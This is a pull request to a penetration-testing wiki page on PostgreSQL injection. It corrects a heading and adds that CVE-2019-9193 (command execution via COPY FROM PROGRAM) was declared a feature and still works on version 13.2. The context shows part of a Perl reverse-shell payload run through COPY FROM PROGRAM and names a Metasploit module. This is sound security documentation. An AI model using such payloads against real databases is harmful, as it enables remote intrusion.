### PR TITLE
Remove upper limit of 11.2 as its not correct.

### DIFF
--- a/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -44,7 +44,7 @@ However, there are **other techniques to upload big binary files**.
 
 ## RCE 
 
-### CVE-2019–9193 **RCE from version 9.3 to 11.2**
+### **RCE from version 9.3**
 
 Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), new functionality for '[COPY TO/FROM PROGRAM](https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/)' was implemented. This allows the database superuser, and any user in the ‘pg\_execute\_server\_program’ group to run arbitrary operating system commands.
 
@@ -62,7 +62,7 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I
 ```
 
 Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**.  
-More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5).
+More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
 
 ### RCE with PostgreSQL extensions
 


### PR DESCRIPTION
Just a minor PR :smile: 

Took the upper version limit and CVE out of the title as its misleading when quickly scanning the page, giving the impression that it is a bug which has probably been patched.

I have confirmed on a fresh install of `PostgreSQL 13.2 on x86_64-alpine-linux-musl, compiled by gcc (Alpine 10.2.1_pre1) 10.2.1 20201203, 64-bit` that it still works as described.